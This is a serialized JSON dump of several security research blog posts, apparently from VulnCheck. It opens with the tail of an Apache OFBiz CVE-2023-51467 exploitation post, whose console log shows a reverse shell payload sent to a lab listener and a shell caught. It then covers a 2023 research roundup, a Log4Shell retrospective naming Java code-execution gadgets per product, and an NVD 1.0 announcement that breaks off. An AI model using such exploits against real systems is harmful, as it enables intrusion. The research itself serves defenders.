},[1373,83143,83144],{"class":1391},"2024-01-08T15:08:26.271-05:00",[1373,83146,38938],{"class":4640},[1373,83148,5417],{"class":1397},[1373,83150,38943],{"class":1391},[1373,83152,38946],{"class":4640},[1373,83154,5417],{"class":1397},[1373,83156,183],{"class":1387},[1373,83158,83159],{"class":1391},"Sending an SSL reverse shell payload for port 
10.9.49.131:1270",[1373,83161,19057],{"class":1387},[1373,83163,83164,83166,83168,83170,83172,83174,83176,83178,83180,83182,83185],{"class":1375,"line":4724},[1373,83165,38930],{"class":4640},[1373,83167,5417],{"class":1397},[1373,83169,83144],{"class":1391},[1373,83171,38938],{"class":4640},[1373,83173,5417],{"class":1397},[1373,83175,38943],{"class":1391},[1373,83177,38946],{"class":4640},[1373,83179,5417],{"class":1397},[1373,83181,183],{"class":1387},[1373,83183,83184],{"class":1391},"Throwing exploit at https:\u002F\u002F10.9.49.99:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F",[1373,83186,19057],{"class":1387},[1373,83188,83189,83191,83193,83196,83198,83200,83202,83204,83206,83208,83211],{"class":1375,"line":4756},[1373,83190,38930],{"class":4640},[1373,83192,5417],{"class":1397},[1373,83194,83195],{"class":1391},"2024-01-08T15:08:27.753-05:00",[1373,83197,38938],{"class":4640},[1373,83199,5417],{"class":1397},[1373,83201,39062],{"class":1391},[1373,83203,38946],{"class":4640},[1373,83205,5417],{"class":1397},[1373,83207,183],{"class":1387},[1373,83209,83210],{"class":1391},"Caught new shell from 10.9.49.99:53519",[1373,83212,19057],{"class":1387},[1373,83214,83215,83217,83219,83222,83224,83226,83228,83230,83232,83234,83237],{"class":1375,"line":4768},[1373,83216,38930],{"class":4640},[1373,83218,5417],{"class":1397},[1373,83220,83221],{"class":1391},"2024-01-08T15:08:27.754-05:00",[1373,83223,38938],{"class":4640},[1373,83225,5417],{"class":1397},[1373,83227,38943],{"class":1391},[1373,83229,38946],{"class":4640},[1373,83231,5417],{"class":1397},[1373,83233,183],{"class":1387},[1373,83235,83236],{"class":1391},"Active shell from 
10.9.49.99:53519",[1373,83238,19057],{"class":1387},[1373,83240,83241],{"class":1375,"line":4792},[1373,83242,6520],{"emptyLinePlaceholder":237},[1373,83244,83245,83247,83249,83251],{"class":1375,"line":4798},[1373,83246,3129],{"class":2206},[1373,83248,46306],{"class":1391},[1373,83250,46309],{"class":4640},[1373,83252,83253],{"class":1391},"10.0.22000.2416]\n",[1373,83255,83256,83258,83260,83262,83264,83266,83268,83270],{"class":1375,"line":4806},[1373,83257,1384],{"class":1383},[1373,83259,28578],{"class":2206},[1373,83261,2230],{"class":1383},[1373,83263,46326],{"class":2206},[1373,83265,46329],{"class":1391},[1373,83267,46332],{"class":1391},[1373,83269,46335],{"class":1391},[1373,83271,46338],{"class":1391},[1373,83273,83274],{"class":1375,"line":4817},[1373,83275,6520],{"emptyLinePlaceholder":237},[1373,83277,83278,83281,83283],{"class":1375,"line":4825},[1373,83279,83280],{"class":2206},"C:\\Users\\albinolobster\\Downloads\\apache-ofbiz-18.12.10\\apache-ofbiz-18.12.10",[1373,83282,5384],{"class":4640},[1373,83284,35556],{"class":1391},[1373,83286,83287],{"class":1375,"line":4835},[1373,83288,35556],{"class":2206},[1373,83290,83291],{"class":1375,"line":4843},[1373,83292,83293],{"class":2206},"albinolobst9bd8\\albinolobster\n",[18,83295,83296,83297,83299],{},"Of course, executing ",[886,83298,22876],{}," spawns cmd.exe and, if you believe Twitter, will cause the EDR teams to come running.",[18,83301,83302],{},[68,83303],{":width":10862,"alt":83304,"src":83305},"whoami generated by Nashorn","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fprocess-spawn.png",[18,83307,83308],{},"But it’s still better than dropping Meterpreter on disk. 
That’ll only make Defender (or whoever) mad.",[18,83310,83311],{},"On the wire, this exploit is not subtle.",[18,83313,83314],{},[68,83315],{":width":10862,"alt":83316,"src":83317},"Exploit on the wire","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fcve-2023-51467-wireshark.png",[18,83319,83320],{},"It does have one thing going for it, though: OFBiz installs typically use TLS, so unless someone is decrypting the traffic, network detections are far less of a concern.",[61,83322,1903],{"id":1902},[18,83324,83325,83326,83330,83331,83333],{},"OFBiz is not widely used, but it has been exploited in the past. There is a fair deal of hype around CVE-2023-51467 but no public weaponized payload, which called into question whether weaponization was even possible. We’ve concluded that not only is it possible, but we can achieve arbitrary in-memory code execution. VulnCheck has ",[47,83327,83329],{"href":82826,"rel":83328},[51],"shared"," a public exploit that will hopefully aid defenders in diagnosing what ",[1131,83332,70230],{}," attacks look like.",[61,83335,202],{"id":201},[18,83337,83338,83339,1246,83342,1255,83345,65315,83350,982,83353,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities like CVE-2023-51467. 
For more research like this, see our blogs, ",[47,83340,40447],{"href":53829,"rel":83341},[51],[47,83343,55229],{"href":53837,"rel":83344},[51],[47,83346,83349],{"href":83347,"rel":83348},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcve-2023-44604-activemq-in-memory",[51],"Executing from Memory Using ActiveMQ CVE-2023-46604",[47,83351,1245],{"href":45535,"rel":83352},[51],[47,83354,216],{"href":214,"rel":83355},[51],[2901,83357,83358],{},"",{"title":219,"searchDepth":220,"depth":220,"links":83360},[83361,83362,83363,83364,83365,83366,83367,83368],{"id":11647,"depth":220,"text":11648},{"id":82219,"depth":220,"text":82220},{"id":82269,"depth":220,"text":82270},{"id":82318,"depth":220,"text":82319},{"id":82463,"depth":220,"text":82464},{"id":82637,"depth":220,"text":82638},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"VulnCheck bypasses the Apache OFBiz Groovy sandbox to land a memory resident reverse shell.",{"slug":83371},"ofbiz-cve-2023-51467","\u002Fblog\u002Fofbiz-cve-2023-51467",{"title":58272,"description":83369},"blog\u002Fofbiz-cve-2023-51467",[242],"vlfhx2Mnh4bH1GLKOawwM-KXG0xe-8NVDFcFx5UtE80",{"id":83378,"title":83379,"articles":7,"authors":83380,"body":83382,"date":83575,"description":83576,"extension":234,"image":7,"link":7,"meta":83577,"navigation":237,"path":83579,"seo":83580,"series":7,"stem":83581,"subtype":7,"tags":7,"__hash__":83582},"blog\u002Fblog\u002Ftop-10-2023.md","Top 10 VulnCheck Research Blogs of 2023",[83381],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":83383,"toc":83557},[83384,83387,83394,83397,83401,83404,83408,83414,83418,83429,83433,83441,83445,83453,83457,83471,83475,83483,83487,83490,83494,83502,83506,83519,83523,83531,83535,83543,83545,83548,83550],[18,83385,83386],{},"As we head into  2024, we're looking back at the interesting vulnerability research that VulnCheck published throughout 2023. 
Over the last year, we’ve shared a range of impactful research, but our favorite research falls into one of two camps:",[1789,83388,83389,83392],{},[25,83390,83391],{},"Novel or new exploitation",[25,83393,25142],{},[18,83395,83396],{},"With our last blog of 2023, we highlight the top 10 VulnCheck research blogs that fall into those categories and describe why we believe they were, and still are, impactful.",[61,83398,83400],{"id":83399},"novel-or-new-exploitation","Novel or New Exploitation",[18,83402,83403],{},"The security community often relies on researchers to develop proof of concept exploits. Defenders use these exploits to help implement appropriate countermeasures. In this group of blogs, VulnCheck developed new exploits and exploitation methods that changed how defenders protected their networks.",[993,83405,83407],{"id":83406},"_1-executing-from-memory-using-activemq-cve-2023-46604","1. Executing from Memory Using ActiveMQ CVE-2023-46604",[18,83409,58229,83410,83413],{},[47,83411,83349],{"href":83347,"rel":83412},[51],", VulnCheck introduced a new method of exploiting CVE-2023-46604 that allowed attackers to execute arbitrary code without touching the filesystem or executing external programs, thereby avoiding detections.",[993,83415,83417],{"id":83416},"_2-fileless-remote-code-execution-on-juniper-firewalls","2. Fileless Remote Code Execution on Juniper Firewalls",[18,83419,58229,83420,83423,83424,83428],{},[47,83421,35931],{"href":53837,"rel":83422},[51],", VulnCheck introduced a new method of exploiting CVE-2023-36845 that, again, allowed attackers to execute arbitrary code without touching the filesystem or executing external programs. We also published a ",[47,83425,69399],{"href":83426,"rel":83427},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-36845-scanner",[51]," and found that, at the time, 80% of Juniper routers remained unpatched.",[993,83430,83432],{"id":83431},"_3-exploitation-of-openfire-cve-2023-32315","3. 
Exploitation of Openfire CVE-2023-32315",[18,83434,58229,83435,83440],{},[47,83436,83439],{"href":83437,"rel":83438},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fopenfire-cve-2023-32315",[51],"Exploitation of Openfire CVE-2023-32315",", VulnCheck introduced a new method of exploiting CVE-2023-32315 that avoided creating a new user, another technique to avoid detection. We also shared that around half of internet-facing Openfire instances remained vulnerable. Finally, we shared Suricata rules that would detect our novel exploitation techniques.",[993,83442,83444],{"id":83443},"_4-exploiting-mikrotik-routeros-hardware-with-cve-2023-30799","4. Exploiting MikroTik RouterOS Hardware with CVE-2023-30799",[18,83446,58229,83447,83452],{},[47,83448,83451],{"href":83449,"rel":83450},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fmikrotik-foisted-revisited",[51],"Exploiting MikroTik RouterOS Hardware with CVE-2023-30799",", VulnCheck shared details on the development of an exploit for CVE-2023-30799 affecting MikroTik routers. At the time of publication, more than 900,000 routers were vulnerable.",[993,83454,83456],{"id":83455},"_5-papercut-exploitation-a-different-path-to-code-execution","5. PaperCut Exploitation - A Different Path to Code Execution",[18,83458,58229,83459,83463,83464,83466,83467,83470],{},[47,83460,83462],{"href":53829,"rel":83461},[51],"PaperCut Exploitation - A Different Path to Code Execution",", VulnCheck shared a different exploitation path for CVE-2023-27350. VulnCheck found a new HTTP endpoint to trigger code execution, and instead of using ",[886,83465,82664],{}," like others, we used python3 (Linux) and ",[886,83468,83469],{},"ftp.exe"," (Windows) to establish a reverse shell. We also shared proof of concept code and Suricata rules to detect the new attack.",[993,83472,83474],{"id":83473},"_6-a-different-payload-for-cve-2022-47966","6. 
A Different Payload for CVE-2022-47966",[18,83476,58229,83477,83482],{},[47,83478,83481],{"href":83479,"rel":83480},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcve-2022-47966-payload",[51],"A Different Payload for CVE-2022-47966",", VulnCheck once again demonstrated a new memory-resident attack, this time for CVE-2022-47966 affecting a wide range of ManageEngine products. VulnCheck also examined some good (and bad!) public detections for CVE-2022-47966.",[61,83484,83486],{"id":83485},"intel-on-exploitation-in-the-wild","Intel on Exploitation in the Wild",[18,83488,83489],{},"Exploitation in the wild is probably the most important topic for the security community. In the following blogs, VulnCheck discovered exploitation in the wild or assessed the likelihood of exploitation in the wild.",[993,83491,83493],{"id":83492},"_7-exposing-rocketmq-cve-2023-33246-payloads","7. Exposing RocketMQ CVE-2023-33246 Payloads",[18,83495,58229,83496,83501],{},[47,83497,83500],{"href":83498,"rel":83499},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Frocketmq-exploit-payloads",[51],"Exposing RocketMQ CVE-2023-33246 Payloads",", VulnCheck was able to extract exploit payloads from exploited hosts on the internet. The result was the ability to identify multiple attackers and their unique approaches to exploitation. This blog pre-dated CVE-2023-33246’s inclusion on the CISA KEV list.",[993,83503,83505],{"id":83504},"_8-widespread-cisco-ios-xe-implants-in-the-wild","8. Widespread Cisco IOS XE Implants in the Wild",[18,83507,58229,83508,83512,83513,83518],{},[47,83509,83511],{"href":41716,"rel":83510},[51],"Widespread Cisco IOS XE Implants in the Wild",", VulnCheck broke the news that there were thousands of implanted Cisco IOS XE devices on the internet. 
We also shared the ",[47,83514,83517],{"href":83515,"rel":83516},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcisco-ios-xe-implant-scanner",[51],"scanner"," we used to scan the internet.",[993,83520,83522],{"id":83521},"_9-assessing-potential-exploitation-of-sophos-firewall-and-cve-2022-3236","9. Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236",[18,83524,58229,83525,83530],{},[47,83526,83529],{"href":83527,"rel":83528},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fsophos-cve-2022-3236",[51],"Assessing Potential Exploitation of Sophos Firewall and CVE-2022-3236",", VulnCheck was the first to publish exploit details for CVE-2022-3236 and, after a scan of the internet, explained why the firewall is highly unlikely to be a mass-exploitation target.",[993,83532,83534],{"id":83533},"_10-looking-for-cve-2023-43261-in-the-real-world","10. Looking for CVE-2023-43261 in the Real World",[18,83536,58229,83537,83542],{},[47,83538,83541],{"href":83539,"rel":83540},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Freal-world-cve-2023-43261",[51],"Looking for CVE-2023-43261 in the Real World",", VulnCheck found evidence that cellular routers affected by CVE-2023-43261, often used in ICS networks, had been widely exploited in the wild. We also discovered that the CVE description did not accurately describe all the affected models and versions.",[61,83544,1903],{"id":1902},[18,83546,83547],{},"2023 was a wild year for vulnerabilities and exploitation. Hopefully, our research and insights had a positive impact on the community. Happy holidays! You’ll see many new payloads from us next year.",[61,83549,202],{"id":201},[18,83551,83552,83553,83556],{},"Are you interested in the vulnerabilities that actually matter? Do you want to track the vulnerabilities attackers are exploiting in the wild? If so, VulnCheck's ",[47,83554,216],{"href":214,"rel":83555},[51]," is for you. 
Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":83558},[83559,83567,83573,83574],{"id":83399,"depth":220,"text":83400,"children":83560},[83561,83562,83563,83564,83565,83566],{"id":83406,"depth":1266,"text":83407},{"id":83416,"depth":1266,"text":83417},{"id":83431,"depth":1266,"text":83432},{"id":83443,"depth":1266,"text":83444},{"id":83455,"depth":1266,"text":83456},{"id":83473,"depth":1266,"text":83474},{"id":83485,"depth":220,"text":83486,"children":83568},[83569,83570,83571,83572],{"id":83492,"depth":1266,"text":83493},{"id":83504,"depth":1266,"text":83505},{"id":83521,"depth":1266,"text":83522},{"id":83533,"depth":1266,"text":83534},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2023-12-26","In our last blog of 2023, we highlight the top 10 VulnCheck research blogs that explored new exploit techniques or exploitation in the wild.",{"slug":83578},"top-10-2023","\u002Fblog\u002Ftop-10-2023",{"title":83379,"description":83576},"blog\u002Ftop-10-2023","NXLNkg3OP7GYLJm_pnJCc4SA2_8gDijZbK3YFB7mxw0",{"id":83584,"title":83585,"articles":83586,"authors":83599,"body":83601,"date":83590,"description":83918,"extension":234,"image":7,"link":7,"meta":83919,"navigation":237,"path":83921,"seo":83922,"series":7,"stem":83923,"subtype":7,"tags":83924,"__hash__":83925},"blog\u002Fblog\u002Flog4shell-retro.md","A Log4Shell Retrospective - Overblown and Exaggerated",[83587,83591,83595],{"title":83588,"source":39566,"link":83589,"date":83590},"Security-by-design and software supply chains.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F239","2023-12-18",{"title":83592,"source":57680,"link":83593,"date":83594},"Impact of Log4Shell Bug Was Overblown, Say Researchers","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fimpact-log4shell-overblown\u002F","2023-12-19",{"title":83596,"source":3494,"link":83597,"date":83598},"Risky Biz News: FBI disrupts AlphV\u002FBlackCat 
ransomware;","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-fbi-disrupts-alphvblackcat","2023-12-20",[83600],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":83602,"toc":83912},[83603,83617,83620,83624,83638,83641,83679,83688,83691,83694,83708,83711,83804,83807,83811,83824,83829,83833,83848,83851,83856,83859,83865,83872,83874,83902,83905,83907],[1925,83604,83605,83608],{},[18,83606,83607],{},"“It is by far the single biggest, most critical vulnerability ever.”",[22,83609,83610],{},[25,83611,83612],{},[47,83613,83616],{"href":83614,"rel":83615},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Flog4j-log4shell-vulnerability-ransomware-second-wave\u002F",[51],"Amit Yoran",[263,83618],{":list":83619,"ico":266,"title":83585},"[\"At the time Log4Shell emerged, only a small subset of software that used the vulnerable log4j libraries were vulnerable to remote code execution.\",\"The current footprint of internet-facing software that is potentially vulnerable to code execution via Log4Shell is approximately 125,000 hosts.\",\"Of the 125,000 hosts, approximately 95% are using known patched versions.\",\"Although many predicted a long tail of exploitation, two years after disclosure there are very few remaining Log4Shell initial access targets.\"]",[61,83621,83623],{"id":83622},"exploitability-is-the-only-thing-that-matters","Exploitability is the only thing that matters",[18,83625,83626,83627,83631,83632,83637],{},"Two years ago, ",[47,83628,61923],{"href":83629,"rel":83630},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-44228",[51]," sent the security industry into a panic. The vulnerability, better known as ",[47,83633,83636],{"href":83634,"rel":83635},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FLog4Shell",[51],"Log4Shell",", had security professionals working overtime through the holidays hunting down vulnerable log4j libraries. 
At the time, there was fear and confusion around what software was affected, which were exploitable, and where attackers would attack next.",[18,83639,83640],{},"The reality was that – at the time – very few products using the vulnerable log4j libraries were remotely exploitable for code execution. Two years after disclosure, we believe the following list is the majority of products that were remotely exploitable using Log4Shell (we left off Minecraft, because it’s a game, and a few lesser known products that we couldn’t confirm code execution against):",[22,83642,83643,83646,83649,83652,83655,83658,83661,83664,83667,83670,83673,83676],{},[25,83644,83645],{},"Apache Druid",[25,83647,83648],{},"Apache James",[25,83650,83651],{},"Apache JSPWiki",[25,83653,83654],{},"Apache OFbiz",[25,83656,83657],{},"Apache Skywalking",[25,83659,83660],{},"Apache Solr",[25,83662,83663],{},"Apache Struts2",[25,83665,83666],{},"Ivanti MobileIron",[25,83668,83669],{},"ManageEngine ADManager",[25,83671,83672],{},"Ubiquiti UniFi Controller",[25,83674,83675],{},"VMware Horizon",[25,83677,83678],{},"VMware vCenter",[18,83680,83681,83682,83687],{},"Many security companies will make a big deal about the ",[47,83683,83686],{"href":83684,"rel":83685},"https:\u002F\u002Fwww.sonatype.com\u002Fresources\u002Flog4j-vulnerability-resource-center",[51],"300 million+ downloads"," of vulnerable log4j libraries over the last two years. The idea being, a lot of projects are vulnerable because they use the vulnerable library. That’s not right though.",[18,83689,83690],{},"The reality is the short list above is the set of actually exploitable software, and only a subset of those products have been linked to exploitation in the wild. 
VulnCheck currently associates Log4Shell exploitation with 40 APT, ransomware groups, and\u002For botnets, but only four of the products above are associated with those attacks: MobileIron, Ubiquiti UniFi Controller, VMware Horizon, and VMware vCenter.",[18,83692,83693],{},"Maybe there are tens of thousands of projects that depend on vulnerable log4j libraries, but of those tens of thousands of projects only these four products are tied to actual exploitation in the wild. That’s largely because exploitation of Log4Shell for code execution is much more complicated than just finding victims that use the vulnerable library.",[18,83695,83696,83697,83701,83702,83704,83705,83707],{},"Log4Shell is a two stage attack. The first stage triggers a connection to an attacker-controlled server when an attacker-controlled string is logged by the victim software. Almost every exploit that we index in ",[47,83698,83700],{"href":74248,"rel":83699},[51],"VulnCheck XDB"," stops here. But it’s important to realize that completing the first stage ",[1131,83703,11536],{}," achieve code execution. For code execution (the second stage), the attacker-controlled server must provide ",[1131,83706,15523],{}," code for the victim to execute. 
This is a non-trivial task in Java, and requires using dependencies and serialized gadgets that may not work against the victim software.",[18,83709,83710],{},"For example, VulnCheck-developed Log4Shell exploits use the following gadgets to achieve code execution:",[307,83712,83713,83722],{},[310,83714,83715],{},[313,83716,83717,83719],{},[316,83718,3584],{},[316,83720,83721],{},"RCE Gadget",[336,83723,83724,83735,83744,83755,83765,83776,83785,83795],{},[313,83725,83726,83728],{},[341,83727,83645],{},[341,83729,83730],{},[47,83731,83734],{"href":83732,"rel":83733},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L411",[51],"Commons Beanutils",[313,83736,83737,83739],{},[341,83738,83648],{},[341,83740,83741],{},[47,83742,83734],{"href":83732,"rel":83743},[51],[313,83745,83746,83748],{},[341,83747,83651],{},[341,83749,83750],{},[47,83751,83754],{"href":83752,"rel":83753},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L277",[51],"Tomcat BeanFactory",[313,83756,83757,83760],{},[341,83758,83759],{},"MobileIron",[341,83761,83762],{},[47,83763,83734],{"href":83732,"rel":83764},[51],[313,83766,83767,83770],{},[341,83768,83769],{},"Apache OFBiz",[341,83771,83772],{},[47,83773,82308],{"href":83774,"rel":83775},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F3df992d393864c6bfc38a59a9831f89df19f8b46\u002Fjava\u002Fldapjndi\u002Fldapjndi.go#L347",[51],[313,83777,83778,83780],{},[341,83779,83663],{},[341,83781,83782],{},[47,83783,83754],{"href":83752,"rel":83784},[51],[313,83786,83787,83790],{},[341,83788,83789],{},"Ubiquiti Unifi 
Controller",[341,83791,83792],{},[47,83793,83754],{"href":83752,"rel":83794},[51],[313,83796,83797,83799],{},[341,83798,83675],{},[341,83800,83801],{},[47,83802,83754],{"href":83752,"rel":83803},[51],[18,83805,83806],{},"Each product is vulnerable to a different set of Java gadgets and some encountered products won’t be vulnerable to any. Exploitation for code execution using Log4Shell, even after exploiting the first stage, is not guaranteed. Your favorite clout chaser on Twitter may claim their Log4Shell canary token is triggered by sending a JNDI string through email, but they have not proven anything when it comes to actual code execution. Landing Log4Shell for code execution is complicated and that’s why real world exploitation has been limited to so few products.",[61,83808,83810],{"id":83809},"very-few-log4shell-targets-remain","Very few Log4Shell targets remain",[18,83812,83813,83814,83819,83820,83823],{},"New reports of Log4Shell exploitation have surfaced as recently as December 11, 2023. ",[47,83815,83818],{"href":83816,"rel":83817},"https:\u002F\u002Fblog.talosintelligence.com\u002Flazarus_new_rats_dlang_and_telegram\u002F",[51],"Cisco Talos"," tied a recent ",[47,83821,81372],{"href":81370,"rel":83822},[51]," campaign to Log4Shell exploitation against VMware Horizon (See?). It begs the question, “After two years, what is the internet footprint of the products that are known to be exploitable by Log4Shell?” At VulnCheck we actually track this and as of December 7, 2023 there were ~125,000 hosts that hosted software that was potentially vulnerable to Log4Shell. What we mean by “potentially vulnerable” is that the software was known to be exploitable for code execution at some time (e.g. 
VMware Horizon).",[1925,83825,83826],{},[18,83827,83828],{},"Internet-Facing Software Potentially Vulnerable to Log4Shell (December 7, 2023)",[11128,83830],{":labels":83831,":values":83832},"[\"Apache Druid\",\"Apache James (POP3)\",\"Apache James (SMTP)\",\"Apache JSPWiki\",\"Apache OFbiz\",\"Apache Skywalking\",\"Apache Solr\",\"Apache Struts2\",\"Ivanti MobileIron\",\"ManageEngine ADManager\",\"Ubiquiti UniFi Controller\",\"VMware Horizon\",\"VMware Vcenter\"]","[335,508,1154,33,900,307,1065,1067,135,409,94165,22298,1900]",[18,83834,83835,83836,83841,83842,83847],{},"125,000 hosts is a decent pool of potential victims, but it isn’t really that many. Just to understand the scale of things on the internet: there are approximately 30x more ",[47,83837,83840],{"href":83838,"rel":83839},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22%2Fdoc%2Fpage%2Flogin.asp%3F_%22",[51],"Hikvision cameras"," and 300x more ",[47,83843,83846],{"href":83844,"rel":83845},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=server%3A+nginx",[51],"nginx servers"," on the internet. 125,000 is a drop in the sea.",[18,83849,83850],{},"Additionally, very few of those 125,000 hosts are currently vulnerable to Log4Shell. Using VulnCheck developed version scanners we examined the installed versions of the internet-facing software and we found ~94% of the hosts are patched against Log4Shell.",[1925,83852,83853],{},[18,83854,83855],{},"Internet-Facing Software Potentially Vulnerable to Log4Shell (Post Version Scan)",[11128,83857],{":labels":83831,":values":83858},"[18,343,664,25,900,1,377,1067,72,22,1515,1973,610]",[18,83860,83861,83862,83864],{},"That leaves just 7,000 ",[295,83863,10300],{}," hosts. With an emphasis on potentially because some of the software have undiscoverable versions (Apache James 3+, OFBiz, and Struts2). Additionally, Apache Solr typically (but not always) has authentication enabled, making it a poor initial access target. 
It’s also difficult to fingerprint the number of the remaining hosts that are honeypots, but we assume it’s a measurable amount.",[18,83866,83867,83868,83871],{},"The number of ",[295,83869,83870],{},"actually vulnerable"," hosts is probably half as many, given the caveats listed above. Which means the security community has done a decent job of cleaning up after this particular vulnerability. There do appear to be some remaining targets (and we’ll likely continue to see reports like Cisco Talos’ recent Lazarus writeup), but the possibility for widespread exploitation is clearly declining overall, and the tail-end is coming to a close as well. Soon, Log4Shell should become a distant memory.",[61,83873,1903],{"id":1902},[18,83875,83876,83877,83881,83882,83886,83887,83891,83892,982,83897,27987],{},"Log4Shell was described as “the single biggest, most critical vulnerability ever”, but in actuality we see multiple vulnerabilities with a similar impact every year (Fortinet ",[47,83878,61739],{"href":83879,"rel":83880},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-27997",[51],", Cisco ",[47,83883,61831],{"href":83884,"rel":83885},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-20198",[51],", and Citrix ",[47,83888,61762],{"href":83889,"rel":83890},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-3519",[51]," all had comparable impact in 2023). Log4Shell never had an overwhelming amount of internet-facing targets, and, because of a strong effort by the security community, very few exploitable targets remain. 
The king of vulnerabilities remains EternalBlue, whose financial impact remains breathtaking more than six years later (see ",[47,83893,83896],{"href":83894,"rel":83895},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Fnotpetya-cyberattack-ukraine-russia-code-crashed-the-world\u002F",[51],"Maersk",[47,83898,83901],{"href":83899,"rel":83900},"https:\u002F\u002Fwww.wsj.com\u002Farticles\u002Fmercks-insurers-on-the-hook-in-1-4-billion-notpetya-attack-court-says-528aeb01",[51],"Merck",[18,83903,83904],{},"Log4Shell has an interesting place in security history because it accelerated the conversation around Software Supply Chain Security & SBOM. But the impact of the vulnerability itself was, and still is, overblown and exaggerated.",[61,83906,202],{"id":201},[18,83908,83552,83909,83556],{},[47,83910,216],{"href":214,"rel":83911},[51],{"title":219,"searchDepth":220,"depth":220,"links":83913},[83914,83915,83916,83917],{"id":83622,"depth":220,"text":83623},{"id":83809,"depth":220,"text":83810},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"Log4Shell was proclaimed one of the most critical vulnerabilities, but in this blog, VulnCheck challenges that perspective, revealing the limited number of vulnerable systems still present two years after the initial disclosure.",{"slug":83920},"log4shell-retro","\u002Fblog\u002Flog4shell-retro",{"title":83585,"description":83918},"blog\u002Flog4shell-retro",[242],"0Ezft1hpVtbH-t76E7374fzEmzF1e01hjlNWE_-AC94",{"id":83927,"title":83928,"articles":7,"authors":83929,"body":83931,"date":84025,"description":83935,"extension":234,"image":7,"link":7,"meta":84026,"navigation":237,"path":84028,"seo":84029,"series":7,"stem":84030,"subtype":7,"tags":84031,"__hash__":84032},"blog\u002Fblog\u002Fnvd-why.md","Why We Are Open-Sourcing NVD 
1.0",[83930],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":83932,"toc":84020},[83933,83936,83939,83942,83945,83949,83952,83955,83958,83961,83965,83985,83990,83993,83997,84003,84006],[18,83934,83935],{},"Managing vulnerabilities at scale is something the entire cybersecurity ecosystem has struggled with for a long time.",[18,83937,83938],{},"As exploited vulnerabilities are becoming a more prominent and driving threat to organizations - particularly freely available vulnerabilities disclosed by software and product manufacturers - it has become clear that vulnerability prioritization, or understanding the level of exploitability of a particular vulnerability, is still really, really hard.",[18,83940,83941],{},"One of the tried and true resources provided to the broader cybersecurity market is NIST’s NVD - the National Vulnerability Database. This tool is leveraged by most, if not all, SecOps and vulnerability management teams. And, there are likely millions of customized workflows built around the NVD feed in every single cybersecurity product designed to enrich this function.",[18,83943,83944],{},"Currently, NVD v1.0 is set to be retired on December 15. As part of VulnCheck’s new Community Platform tier, we are open-sourcing the availability of NVD v1.0, so that teams can have access to it without disrupting custom workflows or without having to re-tool how humans and machines consume CVE data.",[61,83946,83948],{"id":83947},"why-continuity-with-nvd-10-is-essential","Why Continuity With NVD 1.0 is Essential",[18,83950,83951],{},"Speed and efficiency are not just goals – they are necessities in prioritizing and managing vulnerabilities in products and software. 
At VulnCheck, our mission revolves around this principle: to accelerate the cybersecurity ecosystem's ability to identify and neutralize threats, you have to be quicker, and you simply need better data all the time.",[18,83953,83954],{},"The importance of NVD 1.0 in the daily operations of vulnerability management and SecOps teams cannot be overstated - it's the best public yet validated source available to cybersecurity product managers and to SecOps, IR, and vulnerability management teams next to the CISA KEV list.",[18,83956,83957],{},"However, as we edge closer to the NVD's 2.0 API migration deadline on December 15, we are stepping up to ensure that this transition does not slow down the entire ecosystem built around it.",[18,83959,83960],{},"Our commitment to maintaining NIST’s NVD 1.0 reflects our dedication to keeping the cybersecurity community agile and responsive. It's cool working for a company willing to put resources behind supporting the broader cyber ecosystem.",[61,83962,83964],{"id":83963},"why-is-this-important","Why is This Important?",[22,83966,83967,83973,83979],{},[25,83968,83969,83972],{},[295,83970,83971],{},"Facilitating Uninterrupted Workflows",": The cybersecurity community can maintain its current pace and efficiency without the disruption of adapting to new API structures.",[25,83974,83975,83978],{},[295,83976,83977],{},"Supporting Strategic Evolution at a Team’s Own Pace",": This initiative provides the time needed for teams to thoughtfully plan and adapt to NVD 2.0, ensuring no compromise in their operational effectiveness.",[25,83980,83981,83984],{},[295,83982,83983],{},"Promoting Collective Intelligence is Always a Good Thing",": By fostering a community-driven approach, we enable the sharing of strategies and 